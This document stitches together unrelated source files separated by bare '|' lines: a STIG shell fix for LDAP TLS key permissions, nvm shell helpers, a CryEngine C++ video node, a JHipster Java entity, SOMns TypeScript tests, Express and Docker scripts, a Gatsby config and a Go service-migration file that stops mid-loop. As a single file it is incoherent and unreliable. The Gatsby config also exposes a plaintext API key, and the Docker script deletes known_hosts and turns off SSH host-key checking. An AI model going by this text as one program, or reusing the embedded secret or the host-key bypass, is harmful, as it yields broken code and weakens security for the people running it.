#Note: Depending on the particular implementation, group and other read permission may be necessary for unprivileged users to successfully resolve account information using LDAP. This will still be a finding, as these permissions provide users with access to system authenticators.
#
#Responsibility: System Administrator
#IAControls: ECLP-1
#
#Check Content:
#Determine the key file.
# grep -i '^tls_key' /etc/ldap.conf
#Check the permissions.
# ls -lL <keypath>
#If the mode of the file is more permissive than 0600, this is a finding.
#
#Fix Text: Change the mode of the file.
#######################DISA INFORMATION###############################
#Global Variables#
PDI=GEN008340

# Nothing to do if the system is not configured for LDAP.
[ -f /etc/ldap.conf ] || exit 0

#Start-Lockdown
# Every TLS key path declared in /etc/ldap.conf (there may be several).
TLSKEY=$( grep -i '^tls_key' /etc/ldap.conf | awk '{print $2}' )

for line in $TLSKEY
do
    # Bug fix: operate on each listed key file ($line). The original used
    # $TLSKEY inside the loop, which breaks whenever more than one
    # tls_key entry exists (the test and chmod then see the whole list).
    # Also use POSIX [ -e ] instead of the obsolete [ -a ].
    if [ -e "$line" ]
    then
        # Pull the actual permissions
        FILEPERMS=`stat -L --format='%04a' "$line"`
        # Break the actual file octal permissions up per entity
        FILESPECIAL=${FILEPERMS:0:1}
        FILEOWNER=${FILEPERMS:1:1}
        FILEGROUP=${FILEPERMS:2:1}
        FILEOTHER=${FILEPERMS:3:1}
        # Run check by 'and'ing the unwanted mask(7377): anything more
        # permissive than 0600 triggers remediation.
        if [ $(($FILESPECIAL&7)) != "0" ] || [ $(($FILEOWNER&1)) != "0" ] || [ $(($FILEGROUP&7)) != "0" ] || [ $(($FILEOTHER&7)) != "0" ]
        then
            chmod u-x,g-rwxs,o-rwxt "$line"
        fi
    fi
done
# NOTE(review): holy-dot / tis-some / brewCheck are project helpers
# defined elsewhere in this dotfiles framework — presumably holy-dot
# registers this file; confirm against the framework's docs.
holy-dot src/ os install

# nvm-dir: print the nvm installation directory on stdout.
# Resolution order: $NVM_DIR, then a Homebrew install, then ~/.nvm.
# Fails (non-zero) if the resolved directory has no nvm.sh.
nvm-dir() {
    local dir
    if tis-some $NVM_DIR; then
        dir="$NVM_DIR"
    elif [ -x "$(command -v brew)" ] && brewCheck nvm; then
        # brew is installed, and nvm is installed with it (usually onMac)
        # in this case brewOn is rather irrelevant
        dir="$(brew --prefix nvm)"
    else
        # Linux or other not using brew
        dir="$HOME"/.nvm
    fi
    # validate the nvm dir
    if [ -s "$dir"/nvm.sh ]; then
        echo "$dir" && true; return
    else
        false; return
    fi
}

# nvm-on: locate nvm, export NVM_DIR, source nvm.sh (and its bash
# completion if present). Returns non-zero when nvm cannot be found.
nvm-on() {
    local dir="$(nvm-dir)"
    if [ -d "$dir" ]; then
        export NVM_DIR="$dir"
        . "$NVM_DIR"/nvm.sh
        [ -s "$NVM_DIR/bash_completion" ] && . "$NVM_DIR/bash_completion"
        # final check that the nvm function is actually defined now
        command -v nvm > /dev/null
    else
        >&2 echo "Not Found: nvm"
        false; return
    fi
}

# NOTE: If you're using zsh you can easily install nvm as a zsh plugin.
# Install zsh-nvm and run nvm upgrade to upgrade.
# https://github.com/lukechilds/zsh-nvm
# TODO: consider adding shell-dependent logic for install,
# plus upgrading the function below for using nvm upgrade if $SHELL is zsh

# nvm-up: upgrade a git-based nvm install to the newest release tag and
# re-source it (the manual-upgrade recipe from nvm's README).
nvm-up() {
    if tis-some $NVM_DIR; then
        # https://github.com/nvm-sh/nvm#manual-upgrade
        (
            cd "$NVM_DIR"
            git fetch --tags origin
            git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" \
                $(git rev-list --tags --max-count=1)`
        ) && \. "$NVM_DIR/nvm.sh"
    fi
}
|
<reponame>Aboutdept/Plugin_Videoplayer<gh_stars>1-10
/* Videoplayer_Plugin - for licensing and copyright see license.txt */
#include <StdAfx.h>
#include <IPluginVideoplayer.h>
#include <Nodes/G2FlowBaseNode.h>
#include <CPluginVideoplayer.h>
#include <CVideoplayerSystem.h>
namespace VideoplayerPlugin
{
//! Flowgraph node that displays a video on a 2D overlay / fullscreen surface.
//! Owns at most one S2DVideo output, created on "Show" and released on "Hide"
//! or node destruction via gVideoplayerSystem.
class CFlowVideoOutput2DNode : public CFlowBaseNode<eNCT_Instanced>
{
    private:
        S2DVideo* m_p2DVideo; //!< Owned output; NULL when hidden/not yet shown

        //! Input port indices; order must match inputs[] in GetConfiguration.
        enum EInputPorts
        {
            EIP_SHOW = 0,
            EIP_HIDE,
            EIP_VIDEOID,
            EIP_SOUNDSOURCE,
            EIP_RESIZEMODE,
            EIP_CUSTOMAR,
            EIP_REL_TOP,
            EIP_REL_LEFT,
            EIP_REL_WIDTH,
            EIP_REL_HEIGHT,
            EIP_ANGLE,
            EIP_RGB,
            EIP_ALPHA,
            EIP_BG_RGB,
            EIP_BG_ALPHA,
            EIP_ZORDER,
        };

    public:
        CFlowVideoOutput2DNode( SActivationInfo* pActInfo )
        {
            m_p2DVideo = NULL;
        }

        virtual ~CFlowVideoOutput2DNode()
        {
            if ( m_p2DVideo )
            {
                gVideoplayerSystem->Delete2DVideo( m_p2DVideo );
            }
        }

        virtual IFlowNodePtr Clone( SActivationInfo* pActInfo )
        {
            return new CFlowVideoOutput2DNode( pActInfo );
        }

        virtual void GetMemoryUsage( ICrySizer* s ) const
        {
            s->Add( *this );
        }

        //! No per-node state is serialized; the video output is recreated on demand.
        void Serialize( SActivationInfo* pActInfo, TSerialize ser )
        {
        }

        virtual void GetConfiguration( SFlowNodeConfig& config )
        {
            static const SInputPortConfig inputs[] =
            {
                InputPortConfig_Void( "Show", _HELP( "Activate fullscreen" ) ),
                InputPortConfig_Void( "Hide", _HELP( "Hide fullscreen" ) ),
                InputPortConfig<int>( "VideoID", -1, _HELP( "id" ), "nVideoID" ),
                InputPortConfig<bool>( "SoundSource", false, _HELP( "Output 2D Sound for this video" ), "bSoundSource" ),
                InputPortConfig<int>( "ResizeMode", int( VRM_Default ), _HELP( "How should the video be resized to fit the screen" ), "nResizeMode", _UICONFIG( "enum_int:Original=0,Stretch=1,TouchInside=2,TouchOutside=3" ) ),
                InputPortConfig<float>( "CustomAR", 0.0f, _HELP( "Custom Aspect Ratio (4:3=1.33 / 16:9=1.77)" ), "fCustomAR" ),
                InputPortConfig<float>( "Top", 0.0f, _HELP( "Screen relative top" ), "fTop" ),
                InputPortConfig<float>( "Left", 0.0f, _HELP( "Screen relative left" ), "fLeft" ),
                InputPortConfig<float>( "Width", 1, _HELP( "Screen relative width" ), "fWidth" ),
                InputPortConfig<float>( "Height", 1, _HELP( "Screen relative height" ), "fHeight" ),
                InputPortConfig<float>( "Angle", 0, _HELP( "Angle" ), "fAngle" ),
                InputPortConfig<Vec3>( "color_RGB", Vec3( 1, 1, 1 ), _HELP( "RGB " ), "fRGB", _UICONFIG( "" ) ),
                InputPortConfig<float>( "Alpha", 1, _HELP( "Alpha" ), "fAlpha" ),
                InputPortConfig<Vec3>( "color_BGRGB", Vec3( 0, 0, 0 ), _HELP( "Background RGB color" ), "fBG_RGB", _UICONFIG( "" ) ),
                InputPortConfig<float>( "BGAlpha", 0, _HELP( "Alpha when set displays background to fill background" ), "fBG_Alpha" ),
                InputPortConfig<int>( "ZOrder", int( VZP_Default ), _HELP( "When should the video be drawn" ), "nZOrder", _UICONFIG( "enum_int:BehindMenu=0,AboveMenu=1" ) ),
                InputPortConfig_Null(),
            };
            config.pInputPorts = inputs;
            config.pOutputPorts = NULL;
            config.sDescription = _HELP( PLUGIN_CONSOLE_PREFIX "Videodestination/2D & Fullscreen" );
            config.SetCategory( EFLN_APPROVED );
        }

        virtual void ProcessEvent( EFlowEvent evt, SActivationInfo* pActInfo )
        {
            switch ( evt )
            {
                case eFE_Suspend:
                    break;

                case eFE_Resume:
                    break;

                case eFE_Initialize:
                    break;

                case eFE_Activate:
                    if ( IsPortActive( pActInfo, EIP_HIDE ) )
                    {
                        // Guard matches the destructor; avoids handing a NULL
                        // pointer to Delete2DVideo on a redundant Hide.
                        if ( m_p2DVideo )
                        {
                            gVideoplayerSystem->Delete2DVideo( m_p2DVideo );
                            m_p2DVideo = NULL;
                        }
                    }
                    else if ( IsPortActive( pActInfo, EIP_SHOW ) )
                    {
                        if ( !m_p2DVideo )
                        {
                            m_p2DVideo = gVideoplayerSystem->Create2DVideo();
                        }

                        if ( m_p2DVideo )
                        {
                            // Set all properties from the current port values
                            m_p2DVideo->SetSoundsource( GetPortBool( pActInfo, EIP_SOUNDSOURCE ) );
                            m_p2DVideo->SetVideo( gVideoplayerSystem->GetVideoplayerById( GetPortInt( pActInfo, EIP_VIDEOID ) ) );
                            m_p2DVideo->nResizeMode = eResizeMode( GetPortInt( pActInfo, EIP_RESIZEMODE ) );
                            m_p2DVideo->fCustomAR = GetPortFloat( pActInfo, EIP_CUSTOMAR );
                            m_p2DVideo->fRelTop = GetPortFloat( pActInfo, EIP_REL_TOP );
                            m_p2DVideo->fRelLeft = GetPortFloat( pActInfo, EIP_REL_LEFT );
                            m_p2DVideo->fRelWidth = GetPortFloat( pActInfo, EIP_REL_WIDTH );
                            m_p2DVideo->fRelHeight = GetPortFloat( pActInfo, EIP_REL_HEIGHT );
                            m_p2DVideo->fAngle = GetPortFloat( pActInfo, EIP_ANGLE );
                            m_p2DVideo->cRGBA = ColorF( GetPortVec3( pActInfo, EIP_RGB ), GetPortFloat( pActInfo, EIP_ALPHA ) );
                            m_p2DVideo->cBG_RGBA = ColorF( GetPortVec3( pActInfo, EIP_BG_RGB ), GetPortFloat( pActInfo, EIP_BG_ALPHA ) );
                            m_p2DVideo->nZPos = eZPos( GetPortInt( pActInfo, EIP_ZORDER ) );
                        }
                    }
                    else if ( m_p2DVideo )
                    {
                        // Set only the properties whose ports changed
                        if ( IsPortActive( pActInfo, EIP_SOUNDSOURCE ) || IsPortActive( pActInfo, EIP_SHOW ) )
                        {
                            m_p2DVideo->SetSoundsource( GetPortBool( pActInfo, EIP_SOUNDSOURCE ) );
                        }

                        if ( IsPortActive( pActInfo, EIP_VIDEOID ) || IsPortActive( pActInfo, EIP_SHOW ) )
                        {
                            m_p2DVideo->SetVideo( gVideoplayerSystem->GetVideoplayerById( GetPortInt( pActInfo, EIP_VIDEOID ) ) );
                        }

                        if ( IsPortActive( pActInfo, EIP_RESIZEMODE ) )
                        {
                            m_p2DVideo->nResizeMode = eResizeMode( GetPortInt( pActInfo, EIP_RESIZEMODE ) );
                        }

                        if ( IsPortActive( pActInfo, EIP_CUSTOMAR ) )
                        {
                            m_p2DVideo->fCustomAR = GetPortFloat( pActInfo, EIP_CUSTOMAR );
                        }

                        if ( IsPortActive( pActInfo, EIP_REL_TOP ) )
                        {
                            m_p2DVideo->fRelTop = GetPortFloat( pActInfo, EIP_REL_TOP );
                        }

                        if ( IsPortActive( pActInfo, EIP_REL_LEFT ) )
                        {
                            m_p2DVideo->fRelLeft = GetPortFloat( pActInfo, EIP_REL_LEFT );
                        }

                        if ( IsPortActive( pActInfo, EIP_REL_WIDTH ) )
                        {
                            m_p2DVideo->fRelWidth = GetPortFloat( pActInfo, EIP_REL_WIDTH );
                        }

                        if ( IsPortActive( pActInfo, EIP_REL_HEIGHT ) )
                        {
                            m_p2DVideo->fRelHeight = GetPortFloat( pActInfo, EIP_REL_HEIGHT );
                        }

                        if ( IsPortActive( pActInfo, EIP_ANGLE ) )
                        {
                            m_p2DVideo->fAngle = GetPortFloat( pActInfo, EIP_ANGLE );
                        }

                        if ( IsPortActive( pActInfo, EIP_RGB ) )
                        {
                            m_p2DVideo->cRGBA = ColorF( GetPortVec3( pActInfo, EIP_RGB ), GetPortFloat( pActInfo, EIP_ALPHA ) );
                        }

                        if ( IsPortActive( pActInfo, EIP_ALPHA ) )
                        {
                            m_p2DVideo->cRGBA.a = GetPortFloat( pActInfo, EIP_ALPHA );
                        }

                        if ( IsPortActive( pActInfo, EIP_BG_RGB ) )
                        {
                            m_p2DVideo->cBG_RGBA = ColorF( GetPortVec3( pActInfo, EIP_BG_RGB ), GetPortFloat( pActInfo, EIP_BG_ALPHA ) );
                        }

                        if ( IsPortActive( pActInfo, EIP_BG_ALPHA ) )
                        {
                            m_p2DVideo->cBG_RGBA.a = GetPortFloat( pActInfo, EIP_BG_ALPHA );
                        }

                        // BUGFIX: this previously tested EIP_BG_ALPHA (copy/paste
                        // error), so ZOrder port activations were ignored and BG
                        // alpha changes overwrote the z-position instead.
                        if ( IsPortActive( pActInfo, EIP_ZORDER ) )
                        {
                            m_p2DVideo->nZPos = eZPos( GetPortInt( pActInfo, EIP_ZORDER ) );
                        }
                    }

                    break;

                case eFE_Update:
                    break;
            }
        }
};
}
REGISTER_FLOW_NODE_EX( "Videoplayer_Plugin:Output2D", VideoplayerPlugin::CFlowVideoOutput2DNode, CFlowVideoOutput2DNode );
|
<gh_stars>1-10
package fr.syncrase.ecosyst.domain;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import io.swagger.annotations.ApiModel;
import java.io.Serializable;
import javax.persistence.*;
import org.hibernate.annotations.Cache;
import org.hibernate.annotations.CacheConcurrencyStrategy;
/**
 * A "resemblance" between two plants. The relation is directional: for it to
 * work in both directions it must be stored twice — recording "A resembles B"
 * does not imply "B resembles A".
 */
@ApiModel(
description = "Pour que la ressemblance soit réflexive il faut l'enregistrer 2 fois. Car si la ressemblance A ressemble à B est enregistrée, alors B ne ressemble pas à A"
)
@Entity
@Table(name = "ressemblance")
@Cache(usage = CacheConcurrencyStrategy.READ_WRITE)
public class Ressemblance implements Serializable {

    private static final long serialVersionUID = 1L;

    // Database-generated primary key.
    @Id
    @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = "sequenceGenerator")
    @SequenceGenerator(name = "sequenceGenerator")
    @Column(name = "id")
    private Long id;

    // Free-text description of how the two plants resemble each other.
    @Column(name = "description")
    private String description;

    // The plant this resemblance points to; plant collections are ignored
    // during JSON serialization to avoid cycles.
    @ManyToOne
    @JsonIgnoreProperties(
    value = {
    "confusions",
    "ensoleillements",
    "plantesPotageres",
    "cycleDeVie",
    "sol",
    "temperature",
    "racine",
    "strate",
    "feuillage",
    "nomsVernaculaires",
    "classificationCronquist",
    "planteBotanique",
    },
    allowSetters = true
    )
    private Plante planteRessemblant;

    // jhipster-needle-entity-add-field - JHipster will add fields here

    public Long getId() {
    return this.id;
    }

    /** Fluent setter for {@link #id}; returns this entity for chaining. */
    public Ressemblance id(Long id) {
    this.setId(id);
    return this;
    }

    public void setId(Long id) {
    this.id = id;
    }

    public String getDescription() {
    return this.description;
    }

    /** Fluent setter for {@link #description}; returns this entity for chaining. */
    public Ressemblance description(String description) {
    this.setDescription(description);
    return this;
    }

    public void setDescription(String description) {
    this.description = description;
    }

    public Plante getPlanteRessemblant() {
    return this.planteRessemblant;
    }

    public void setPlanteRessemblant(Plante plante) {
    this.planteRessemblant = plante;
    }

    /** Fluent setter for {@link #planteRessemblant}; returns this entity for chaining. */
    public Ressemblance planteRessemblant(Plante plante) {
    this.setPlanteRessemblant(plante);
    return this;
    }

    // jhipster-needle-entity-add-getters-setters - JHipster will add getters and setters here

    @Override
    public boolean equals(Object o) {
    if (this == o) {
    return true;
    }
    if (!(o instanceof Ressemblance)) {
    return false;
    }
    // Entities are equal only when both are persisted with the same id.
    return id != null && id.equals(((Ressemblance) o).id);
    }

    @Override
    public int hashCode() {
    // see https://vladmihalcea.com/how-to-implement-equals-and-hashcode-using-the-jpa-entity-identifier/
    return getClass().hashCode();
    }

    // prettier-ignore
    @Override
    public String toString() {
    return "Ressemblance{" +
    "id=" + getId() +
    ", description='" + getDescription() + "'" +
    "}";
    }
}
|
import { expect } from "chai";
import { spawn } from "child_process";
import {
SOM, HandleStoppedAndGetStackTrace, TestConnection, execSom,
expectStack
} from "./test-setup";
// Running the VM with -h should print usage text and exit with status 0.
describe("Command-line Behavior", function() {
    it("should show help", done => {
        let sawOutput = false;
        const somProc = spawn(SOM, ["-h"]);
        // Any stdout output at all counts as "help was shown".
        somProc.stdout.on("data", (_data) => { sawOutput = true; });
        somProc.on("exit", (code) => {
            expect(sawOutput).to.be.true;
            expect(code).to.equal(0);
            done();
        });
    });
});
// Compares full stack-trace output against golden strings. All digits are
// stripped (replace(/\d/g, "")) so the comparison is stable across changing
// line/column numbers in the traces.
describe("Stack trace output", () => {
    it("should be correct for #doesNotUnderstand", () => {
        const result = execSom(["dnu"]);
        expect(result.output[1].toString().replace(/\d/g, "")).to.equal("Stack Trace\n\
\tPlatform>>#start Platform.ns::\n\
\tBlock>>#on:do: Kernel.ns::\n\
\tvmMirror>>#exceptionDo:catch:onException: ExceptionDoOnPrimFactory::\n\
\tPlatform>>#λstart@@ Platform.ns::\n\
\tPingPongApp>>#main: pingpong.ns::\n\
\tPingPongApp>>#testDNU pingpong.ns::\n\
ERROR: MessageNotUnderstood(Integer>>#foobar)\n");
    });

    it("should be correct for `system printStackTrace`", () => {
        const result = execSom(["stack"]);
        expect(result.output[1].toString().replace(/\d/g, "")).to.equal("Stack Trace\n\
\tPlatform>>#start Platform.ns::\n\
\tBlock>>#on:do: Kernel.ns::\n\
\tvmMirror>>#exceptionDo:catch:onException: ExceptionDoOnPrimFactory::\n\
\tPlatform>>#λstart@@ Platform.ns::\n\
\tPingPongApp>>#main: pingpong.ns::\n\
\tPingPongApp>>#testPrintStackTrace pingpong.ns::\n");
    });
});
// End-to-end check of the debugger protocol: run a program containing
// `1 halt`, wait for the suspended event, and inspect the reported stack.
describe("Language Debugger Integration", function() {
    let conn: TestConnection;
    let ctrl: HandleStoppedAndGetStackTrace;

    // Shared teardown: close the debugger connection once it is (or fails
    // to become) fully connected.
    const closeConnectionAfterSuite = (done) => {
        conn.fullyConnected.then(_ => { conn.close(done); });
        conn.fullyConnected.catch(reason => done(reason));
    };

    describe("execute `1 halt` and get suspended event", () => {
        before("Start SOMns and Connect", () => {
            conn = new TestConnection(["halt"]);
            ctrl = new HandleStoppedAndGetStackTrace([], conn, conn.fullyConnected);
        });

        after(closeConnectionAfterSuite);

        it("should halt on expected source section", () => {
            // First stop event: expect 6 frames, topmost in #testHalt at line 106.
            return ctrl.stackPs[0].then(msg => {
                expectStack(msg.stackFrames, 6, "PingPongApp>>#testHalt", 106);
            });
        });
    });
});
|
<reponame>ticlo/server-example<filename>src/route-example/main.ts
import Express from 'express';
import {Root} from '@ticlo/core';
import {connectTiclo, routeTiclo, getEditorUrl} from '@ticlo/express';
import {FileJobLoader} from '@ticlo/node';
// Save/load ticlo jobs from this same folder.
Root.instance.setLoader(new FileJobLoader('./src/route-example'));
let app = Express();
// Attach the ticlo websocket endpoint at the root path.
connectTiclo(app, '');
// Serve ticlo's HTTP routes under /ticlo.
routeTiclo(app, '/ticlo');
app.listen(8011);
// Print a browser URL for the editor pointing at this server's 'static-route' job.
console.log(getEditorUrl('ws://127.0.0.1:8011', 'static-route'));
|
# Export the local SSH agent's public keys so the container accepts them.
ssh-add -L > ~/myhost/authorized_keys

# Remove any previous builder container, suppressing all output.
# BUGFIX: the original `2>&1 >> /dev/null` redirected stderr to the terminal
# (redirections apply left to right); the file must be redirected first.
docker rm builder_sonic -f >> /dev/null 2>&1

# Start a fresh builder with ~/myhost mounted and sshd exposed on port 5002.
docker run -d --name builder_sonic -it -v $HOME/myhost:/myhost \
    -p 5002:22 \
    --hostname sonic \
    builders_sonic
#    -v /run/host-services/ssh-auth.sock:/run/host-services/ssh-auth.sock -e SSH_AUTH_SOCK="/run/host-services/ssh-auth.sock" \

# UGLY HACK to remove the known_hosts file, since the container's host key
# changes on every rebuild.
rm -f ~/.ssh/known_hosts

# Give sshd a moment to come up before connecting.
sleep 0.6

# With any argument: just (re)create the container. Without: drop into a shell.
if [ "$1" ]; then
    exit 0
else
    ssh -A -o "StrictHostKeyChecking=no" root@localhost -p 5002
fi
|
<reponame>amurrill/Gatsby-Weather-App
// Gatsby site configuration: site metadata plus the weather-data source plugins.
module.exports = {
    siteMetadata: {
        title: `Gatsby Starter Weather - DarkSky and OpenWeather`,
        /* pathPrefix: '/static-gatsby-weather',*/
    },
    plugins: [
        {
            // PWA manifest: install name, colors, and app icon.
            resolve: `gatsby-plugin-manifest`,
            options: {
                name: `Gatsby-starter-weather`,
                short_name: `GatsbySW`,
                start_url: `/`,
                background_color: `#6b37bf`,
                theme_color: `#6b37bf`,
                display: `standalone`,
                icon: `src/images/cloudy.png`, // This path is relative to the root of the site.
            },
        },
        'gatsby-plugin-offline',
        {
            // Current conditions from OpenWeatherMap.
            // SECURITY(review): the API key is committed in plain text — move it
            // to an environment variable and rotate the key.
            resolve: 'gatsby-source-openweathermap',
            options: {
                apikey: 'b836e6879a0aee23a9de2c7e84fdd19a',
                location: 'Seminole, Florida',
                units: 'imperial',
                type: 'weather'
            },
        },
        {
            // Forecast data from DarkSky for fixed coordinates; minutely data excluded.
            resolve: 'gatsby-source-darksky',
            options: {
                key: '<KEY>',
                latitude: '39.791000',
                longitude: '-86.148003',
                exclude: ['minutely']
            },
        }
    ]
}
|
package scmigration
import (
"bytes"
"encoding/json"
"fmt"
"net/http"
"strings"
"github.com/SAP/sap-btp-service-operator/api/v1alpha1"
"github.com/SAP/sap-btp-service-operator/client/sm"
"github.com/SAP/sap-btp-service-operator/client/sm/types"
"github.com/kyma-incubator/reconciler/pkg/reconciler/instances/scmigration/apis/servicecatalog/v1beta1"
"github.com/kyma-incubator/reconciler/pkg/reconciler/service"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/kubectl/pkg/scheme"
)
// It was decided that this reconciler should reuse code from sap-btp-service-operator-migration application
// This file contains copy of unnexported code from the sap-btp-service-operator-migration and improved
// logging with error handling. The migration logic remains unmodified.
// https://github.com/SAP/sap-btp-service-operator-migration/blob/v0.1.2/migrate/migrator.go
const (
migratedLabel = "migrated"
serviceInstances = "serviceinstances"
serviceBindings = "servicebindings"
)
type serviceInstancePair struct {
svcatInstance *v1beta1.ServiceInstance
smInstance *types.ServiceInstance
}
type serviceBindingPair struct {
svcatBinding *v1beta1.ServiceBinding
smBinding *types.ServiceBinding
}
type object interface {
metav1.Object
runtime.Object
}
type migrator struct {
SMClient sm.Client
SvcatRestClient *rest.RESTClient
SapOperatorRestClient *rest.RESTClient
ClientSet *kubernetes.Clientset
ClusterID string
Services map[string]types.ServiceOffering
Plans map[string]types.ServicePlan
ac *service.ActionContext
}
// newMigrator wires up everything the svcat -> BTP-operator migration needs:
// a Service Manager client authenticated from the "sap-btp-service-operator"
// secret, REST clients for both the svcat and the operator API groups, the
// cluster ID from the operator's ConfigMap, and ID-indexed caches of all SM
// offerings and plans.
func newMigrator(ac *service.ActionContext) (*migrator, error) {
	ctx := ac.Context
	namespace := ac.Task.Namespace
	// Build a rest.Config from the kubeconfig carried by the reconciler task.
	cfg, err := clientcmd.RESTConfigFromKubeConfig([]byte(ac.KubeClient.Kubeconfig()))
	if err != nil {
		return nil, err
	}
	cs, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		return nil, err
	}
	// Register the operator's v1alpha1 types so the REST client can decode them.
	err = v1alpha1.AddToScheme(scheme.Scheme)
	if err != nil {
		return nil, err
	}
	secret, err := cs.CoreV1().Secrets(namespace).Get(ctx, "sap-btp-service-operator", metav1.GetOptions{})
	if err != nil {
		return nil, fmt.Errorf("failed to get Secret %v/sap-btp-service-operator: %w", namespace, err)
	}
	configMap, err := cs.CoreV1().ConfigMaps(namespace).Get(ctx, "sap-btp-operator-config", metav1.GetOptions{})
	if err != nil {
		return nil, fmt.Errorf("failed to get ConfigMap %v/sap-btp-operator-config: %w", namespace, err)
	}
	smClient, err := getSMClient(ctx, secret)
	if err != nil {
		return nil, fmt.Errorf("failed to instantiate SMClient with secret %v/%v: %w", secret.Namespace, secret.Name, err)
	}
	// Pre-fetch offerings and plans once; migration looks them up by ID.
	services, err := getServices(smClient)
	if err != nil {
		return nil, fmt.Errorf("failed to get SM services: %w", err)
	}
	plans, err := getPlans(smClient)
	if err != nil {
		return nil, fmt.Errorf("failed to get SM plans: %w", err)
	}
	migrator := &migrator{
		ac:                    ac,
		SMClient:              smClient,
		SvcatRestClient:       getK8sClient(cfg, svCatGroupName, svCatGroupVersion),
		SapOperatorRestClient: getK8sClient(cfg, operatorGroupName, operatorGroupVersion),
		ClientSet:             cs,
		ClusterID:             configMap.Data["CLUSTER_ID"],
		Services:              services,
		Plans:                 plans,
	}
	return migrator, nil
}
// getPlans fetches every service plan from Service Manager and returns them
// indexed by plan ID for O(1) lookups during migration.
func getPlans(smclient sm.Client) (map[string]types.ServicePlan, error) {
	listing, err := smclient.ListPlans(nil)
	if err != nil {
		return nil, err
	}
	byID := make(map[string]types.ServicePlan, len(listing.ServicePlans))
	for i := range listing.ServicePlans {
		p := listing.ServicePlans[i]
		byID[p.ID] = p
	}
	return byID, nil
}
// getServices fetches every service offering from Service Manager and returns
// them indexed by offering ID for O(1) lookups during migration.
func getServices(smclient sm.Client) (map[string]types.ServiceOffering, error) {
	listing, err := smclient.ListOfferings(nil)
	if err != nil {
		return nil, err
	}
	byID := make(map[string]types.ServiceOffering, len(listing.ServiceOfferings))
	for i := range listing.ServiceOfferings {
		offering := listing.ServiceOfferings[i]
		byID[offering.ID] = offering
	}
	return byID, nil
}
// migrateBTPOperator migrates all svcat service instances and bindings that
// belong to this cluster from the Service Catalog to the SAP BTP operator.
// Failures of individual resources are collected and reported together, so a
// single bad resource does not abort the whole migration.
func (m *migrator) migrateBTPOperator() error {
	// Restrict SM queries to resources provisioned from this cluster.
	parameters := &sm.Parameters{
		FieldQuery: []string{
			fmt.Sprintf("context/clusterid eq '%s'", m.ClusterID),
		},
	}
	smInstances, err := m.SMClient.ListInstances(parameters)
	if err != nil {
		return err
	}
	m.ac.Logger.Infof("Fetched %v instances from SM", len(smInstances.ServiceInstances))
	smBindings, err := m.SMClient.ListBindings(parameters)
	if err != nil {
		return err
	}
	m.ac.Logger.Infof("Fetched %v bindings from SM", len(smBindings.ServiceBindings))
	ctx := m.ac.Context
	// Fetch svcat resources cluster-wide; NotFound just means none exist.
	svcatInstances := v1beta1.ServiceInstanceList{}
	err = m.SvcatRestClient.Get().Namespace("").Resource(serviceInstances).Do(ctx).Into(&svcatInstances)
	if err != nil && !errors.IsNotFound(err) {
		return err
	}
	m.ac.Logger.Infof("Fetched %v svcat instances from cluster", len(svcatInstances.Items))
	svcatBindings := v1beta1.ServiceBindingList{}
	err = m.SvcatRestClient.Get().Namespace("").Resource(serviceBindings).Do(ctx).Into(&svcatBindings)
	if err != nil && !errors.IsNotFound(err) {
		return err
	}
	m.ac.Logger.Infof("Fetched %v svcat bindings from cluster", len(svcatBindings.Items))
	m.ac.Logger.Infof("Preparing resources")
	// Pair svcat resources with their SM counterparts; unmatched ones are skipped.
	instancesToMigrate := m.getInstancesToMigrate(smInstances, svcatInstances)
	bindingsToMigrate := m.getBindingsToMigrate(smBindings, svcatBindings)
	if len(instancesToMigrate) == 0 && len(bindingsToMigrate) == 0 {
		m.ac.Logger.Infof("no svcat instances or bindings found for migration")
		return nil
	}
	m.ac.Logger.Infof("found %d instances and %d bindings to migrate", len(instancesToMigrate), len(bindingsToMigrate))
	// Collect per-resource failures instead of failing fast.
	var failuresBuffer bytes.Buffer
	for _, pair := range instancesToMigrate {
		err := m.migrateInstance(pair)
		if err != nil {
			m.ac.Logger.Error(err)
			failuresBuffer.WriteString(err.Error() + "\n")
		}
	}
	for _, pair := range bindingsToMigrate {
		err := m.migrateBinding(pair)
		if err != nil {
			m.ac.Logger.Error(err)
			failuresBuffer.WriteString(err.Error() + "\n")
		}
	}
	if failuresBuffer.Len() == 0 {
		m.ac.Logger.Infof("Migration completed successfully")
		return nil
	}
	m.ac.Logger.Errorf("Migration failures summary: %v", failuresBuffer.String())
	// BUGFIX: use an explicit "%s" verb. Passing the collected error text as
	// the format string would misinterpret any '%' it happens to contain
	// (govet: non-constant format string in call to fmt.Errorf).
	return fmt.Errorf("%s", failuresBuffer.String())
}
// getInstancesToMigrate pairs each svcat instance with its SM counterpart by
// matching svcat's Spec.ExternalID against the SM instance ID. svcat
// instances without an SM counterpart are logged and skipped.
func (m *migrator) getInstancesToMigrate(smInstances *types.ServiceInstances, svcatInstances v1beta1.ServiceInstanceList) []serviceInstancePair {
	validInstances := make([]serviceInstancePair, 0)
	for _, svcat := range svcatInstances.Items {
		var smInstance *types.ServiceInstance
		// Take the address of the slice element (not the loop variable) so the
		// pointer stays valid after the loop.
		for i, instance := range smInstances.ServiceInstances {
			if instance.ID == svcat.Spec.ExternalID {
				smInstance = &smInstances.ServiceInstances[i]
				break
			}
		}
		if smInstance == nil {
			// NOTE(review): this log prints svcat.Name twice — one of the
			// placeholders was presumably meant to be the namespace; confirm.
			m.ac.Logger.Infof("svcat instance name '%s' id '%s' (%s) not found in SM, skipping it...", svcat.Name, svcat.Spec.ExternalID, svcat.Name)
			continue
		}
		// Copy the loop variable so each pair holds a stable pointer.
		svcInstance := svcat
		validInstances = append(validInstances, serviceInstancePair{
			svcatInstance: &svcInstance,
			smInstance:    smInstance,
		})
	}
	return validInstances
}
// getBindingsToMigrate pairs each svcat binding with its SM counterpart by
// matching svcat's Spec.ExternalID against the SM binding ID. svcat bindings
// without an SM counterpart are logged and skipped.
func (m *migrator) getBindingsToMigrate(smBindings *types.ServiceBindings, svcatBindings v1beta1.ServiceBindingList) []serviceBindingPair {
	validBindings := make([]serviceBindingPair, 0)
	for _, svcat := range svcatBindings.Items {
		var smBinding *types.ServiceBinding
		// Take the address of the slice element (not the loop variable) so the
		// pointer stays valid after the loop.
		for i, binding := range smBindings.ServiceBindings {
